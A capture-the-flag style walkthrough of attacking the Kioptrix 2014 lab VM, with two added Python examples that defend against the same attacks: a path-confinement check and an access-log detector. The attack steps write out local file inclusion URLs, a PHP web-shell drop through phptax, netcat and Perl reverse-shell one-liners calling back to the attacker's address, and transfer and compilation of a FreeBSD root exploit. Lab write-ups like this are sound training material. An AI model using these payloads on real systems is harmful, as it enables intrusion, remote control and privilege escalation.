I previously thought there were only 4 Kioptrix levels until I found Kioptrix 2014. For this test, the following are the things that you’ll need:
Spoiler alert! If you’re trying to practice hacking in a controlled environment, I suggest downloading Kioptrix 2014 or any other vulnerable machine from VulnHub, close this page, and do your own attack. Come back if you’re a bit lost or just need a guide.
I won’t be discussing how to set up your virtual environment here. You just need to install Kali and Kioptrix 2014, and then you’re ready. Please note that Kali and Kioptrix are on the same local network. Boot up Kioptrix 2014 and you’ll be welcomed with this screen:
The goal of the exercise is still the same as in the previous levels: we need to acquire root access. At this point, we should also start Kali, so there are currently two VMs running in VMware (I’m using this instead of VirtualBox).
To start off, we should first identify the current local area network. In Kali, open the terminal and type in “ifconfig”. You should get a result similar to this:
The IP address of my Kali machine is 192.168.209.139 and the subnet mask is 255.255.255.0 (/24). This means that the IP address of Kioptrix should be 192.168.209.X, where X is a number between 0 and 255. We can find its IP address, together with the services it runs, by scanning the subnet with nmap: “nmap 192.168.209.0/24”. Notice that a few results popped up and the host with the IP address 192.168.209.144 seems interesting.
We can also do another scan specific to this IP address to show the version of the services running by typing in:
nmap -sV 192.168.209.144
The results give a more detailed report on the specific versions of the services running on Kioptrix. They show two Apache services, which we can check in a browser. Visiting the service on port 80 gives:
For the one in port 8080 however, it appears that there’s a restriction:
Going back to the one on port 80: since it’s a very simple page, checking the source would normally turn up nothing, but this one gives us a clue:
The website appears to use pChart 2.1.3, and visiting the link “http://192.168.209.144/pChart2.1.3/index.php” gives us this output:
A quick Google search shows that there are known vulnerabilities in the pChart plugin.
According to the post from exploit-db, we can do a local file inclusion using the link:
http://192.168.209.144/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
This can actually be simplified to:
http://192.168.209.144/pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd
The output when visiting the link shows:
All non-root users appear to have shell access disabled. The file does, however, show that this is a FreeBSD build, and looking up the usual locations of interesting files on FreeBSD leads us to the httpd configuration and its log paths.
By entering the path of the httpd.config file in the URL, we can read its contents:
Upon checking the configuration, the error log path is “/var/log/httpd-error.log” and the access log path is “/var/log/httpd-access.log”. This is worth noting down, because log files that we can write to (by making requests) and then include are a classic entry point for turning a local file inclusion into code execution. Another interesting thing to note here is the access condition for port 8080.
According to that condition, if the client’s User-Agent contains “Mozilla/4.0”, access should be allowed. Since the User-Agent header is entirely under the client’s control, this is not really an access control at all. With this in mind, we can change our User-Agent in Firefox by visiting the about:config page:
Search for “useragent” and double click on “general.useragent.override” then change the value to “Mozilla/4.0”.
Once this is set, we are now able to access 192.168.209.144 at port 8080.
By clicking the link, we are presented with a new web application called “phptax”:
A Google search turns up several known vulnerabilities that we can probably exploit:
After trying a few without managing to get a shell back through netcat, I found this one on exploit-db. By visiting the link:
192.168.209.144:8080/phptax/index.php
With these data:
- field=ourcode.php
- newvalue=<?php system($_GET['cmd']);?>
Ending up in a full URL:
192.168.209.144:8080/phptax/index.php?field=ourcode.php&newvalue=<?php system($_GET['cmd']);?>
The application writes “newvalue” into the file named by “field”, which means a new PHP file named “ourcode.php” gets created with the contents “<?php system($_GET['cmd']);?>”. This further means that if we visit the PHP file “ourcode.php”, we can execute system commands on Kioptrix!
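Both weaknesses used so far come down to the same missing check: pChart opens whatever the “Script” parameter names for reading, and phptax opens whatever the “field” parameter names for writing, with the raw value in each case. The following is an added example (not code from the Kioptrix VM, pChart or phptax) of the confinement check a file-handling endpoint needs before touching the filesystem. The base directory “/var/www/data” and the allowed “.txt” suffix are assumptions for the demonstration; the directory does not need to exist.

```python
"""Confine a user-supplied file name to one directory and one file type.

Added example, not code from pChart or phptax. `resolve_within` returns an
absolute path only when the (decoded) value stays inside DATA_DIR and has an
expected suffix; everything else raises UnsafePath.
"""
import os
from urllib.parse import unquote

# Assumed location of the application's data files (not from the original post).
DATA_DIR = "/var/www/data"
ALLOWED_SUFFIXES = (".txt",)


class UnsafePath(ValueError):
    """Raised when a user-supplied path would leave the allowed directory."""


def resolve_within(user_value, base_dir=DATA_DIR, allowed_suffixes=ALLOWED_SUFFIXES):
    """Map user_value to an absolute path under base_dir, or raise UnsafePath.

    The value is URL-decoded first because a traversal can arrive encoded
    (`%2f..%2f..%2fetc/passwd`) and be decoded by a later layer.
    """
    value = unquote(user_value)
    if "\x00" in value:                      # a NUL byte truncates C-level paths
        raise UnsafePath("NUL byte in path")
    if os.path.isabs(value):                 # the `/etc/passwd` form
        raise UnsafePath("absolute path not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value))
    # realpath collapses `..` segments and follows symlinks, so compare the
    # final location with the base directory rather than the raw string.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePath("path escapes base directory: %r" % value)
    if not candidate.endswith(allowed_suffixes):
        # Blocks writing `ourcode.php` into a directory the web server executes from.
        raise UnsafePath("unexpected file type: %r" % value)
    return candidate


def check(user_value):
    """True if user_value would be accepted by resolve_within, False if rejected."""
    try:
        resolve_within(user_value)
        return True
    except UnsafePath:
        return False


if __name__ == "__main__":
    # Constructed inputs: the first is legitimate, the rest mirror the requests above.
    for v in ("report.txt", "/etc/passwd", "%2f..%2f..%2fetc/passwd",
              "../../etc/passwd", "ourcode.php"):
        print("%-28s %s" % (v, "ok" if check(v) else "REJECTED"))
```

The suffix allowlist matters as much as the traversal check: phptax’s “field” value stayed inside the application directory, so a traversal filter alone would have let “ourcode.php” through. Rejecting the file type, or keeping the writable directory outside the web root, is what stops the written file from ever being executed.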
By visiting the link:
192.168.209.144:8080/phptax/data/ourcode.php?cmd=id
We should get this output:
The next thing to do here would be trying to establish a reverse shell using netcat in Kali. By typing in:
nc -lvp 5555
We should have Kali listen for an incoming connection.
Once our listener is ready, by entering the URL:
192.168.209.144:8080/phptax/data/ourcode.php?cmd=nc -nv 192.168.209.139 5555 -e /bin/bash
Kioptrix (192.168.209.144) should then connect back to Kali (192.168.209.139); however, this didn’t work. Further investigation led to these findings:
- Kioptrix has no “bash” (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which bash)
- Kioptrix has “sh” (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which sh)
- Trying “192.168.209.144:8080/phptax/data/ourcode.php?cmd=nc -nv 192.168.209.139 5555 -e /bin/sh” still didn’t work
- Trying to connect via telnet didn’t work
At this point, I thought about using a scripting language to make the shell connection. Python was unfortunately not installed on the machine (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which python), but Perl was (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which perl), so I used this Perl reverse shell snippet from ethicalhackx:
perl -e 'use Socket;$i="192.168.209.139";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
URL-encoding it with an online encoder gives:
perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.209.139%22%3B%24p%3D5555%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27
By visiting the link:
192.168.209.144:8080/phptax/data/ourcode.php?cmd=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.209.139%22%3B%24p%3D5555%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27
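Every step of this attack path, from the traversal in “Script” to the percent-encoded Perl one-liner in “cmd”, was a plain GET request, so all of it sits in the “/var/log/httpd-access.log” file read earlier. The following is an added detection example (not part of the original post) that runs a few rules over Apache combined-format log lines. The log lines are constructed to mirror the requests in this walkthrough; the timestamps, client address and User-Agent strings are made up, and the rule that flags PHP executing from a “data/” directory assumes that directory is meant to hold data, not scripts. The point the page’s own payload illustrates is that the log stores the request line as the client sent it, so the rules must percent-decode the query before matching.

```python
"""Flag LFI, web-shell drops and command execution in Apache access logs.

Added example, not from the original post. parse_qsl percent-decodes the
query string, which is what lets a rule see `%3C%3Fphp` as `<?php` and the
encoded Perl one-liner as shell text.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Apache "combined" format: ip ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Parameter names that are expected to hold a file name; traversal or an
# absolute path in one of these is a local file inclusion indicator.
FILE_PARAMS = {"script", "field", "file", "page", "include"}
# Reverse-shell tooling showing up inside any parameter value.
SHELL_RE = re.compile(r"\b(?:nc|ncat|telnet)\s|\bperl\s+-e\b|/bin/(?:ba)?sh\b")

# Constructed sample log (addresses, times and User-Agents are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /phptax/index.php?field=ourcode.php&newvalue=%3C%3Fphp+system(%24_GET%5B'cmd'%5D)%3B%3F%3E HTTP/1.1" 200 310 "-" "Mozilla/4.0"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /phptax/data/ourcode.php?cmd=id HTTP/1.1" 200 60 "-" "Mozilla/4.0"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /phptax/data/ourcode.php?cmd=perl%20-e%20%27use%20Socket%3B...exec%28%22%2Fbin%2Fsh%20-i%22%29%3B%27 HTTP/1.1" 200 0 "-" "Mozilla/4.0"
"""


def decoded_params(request_line):
    """Split 'GET /path?query HTTP/1.1' into (decoded path, [(name, value), ...])."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else parts[0]
    url = urlsplit(target)
    return unquote_plus(url.path), parse_qsl(url.query, keep_blank_values=True)


def classify(line):
    """Return the sorted list of rule names that fire on one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    path, params = decoded_params(m.group("request"))
    hits = set()
    for name, value in params:
        low = name.lower()
        if low in FILE_PARAMS and ("../" in value or value.startswith("/")):
            hits.add("path-traversal")
        if "<?php" in value.lower():
            hits.add("php-code-in-parameter")
        if low == "cmd" or SHELL_RE.search(value):
            hits.add("command-in-parameter")
    # Assumption: "data/" is a writable data directory and should never serve PHP.
    if path.endswith(".php") and "/data/" in path:
        hits.add("script-in-upload-dir")
    return sorted(hits)


def scan(log_text):
    """Return [(line_number, hits)] for every line that triggers at least one rule."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        hits = classify(line)
        if hits:
            findings.append((number, hits))
    return findings


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print("line %d: %s" % (number, ", ".join(hits)))
```

Run as a script it prints one finding per suspicious line; the traversal rule fires on both the encoded and the plain form of the pChart request because the match happens after decoding. Matching on the raw request line instead would miss the encoded variant entirely, which is exactly the form the Perl payload took.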
We get a shell!
From here on, the next thing to do is escalating our privilege to become root.
The FreeBSD version appears to be 9.0-RELEASE, and after some research this privilege escalation exploit looked like the right one. We can transfer its source code from Kali to Kioptrix by typing this command in Kali:
nc -lvp 8888 < freebsd_priv.c
In Kioptrix, navigate to the “/tmp” folder and type in the command:
nc -nv 192.168.209.139 8888 > freebsd_priv.c
Once the connection has been established, close the netcat terminal in Kali so that the file transfer connection is closed too.
When “freebsd_priv.c” is transferred to Kioptrix, type in:
gcc -o freebsd_priv freebsd_priv.c
The command above compiles the privilege escalation exploit. We then use chmod to make the compiled program executable:
chmod +x freebsd_priv
At this point, if we execute the program by typing in the command:
./freebsd_priv
We get a root shell!
Navigate into the “/root” folder and the file “congrats.txt” can be read.
I think this ends the fun times with Kioptrix, as this seems to be the last level available. I’ll probably download more from VulnHub and see how the “getting in” process goes there.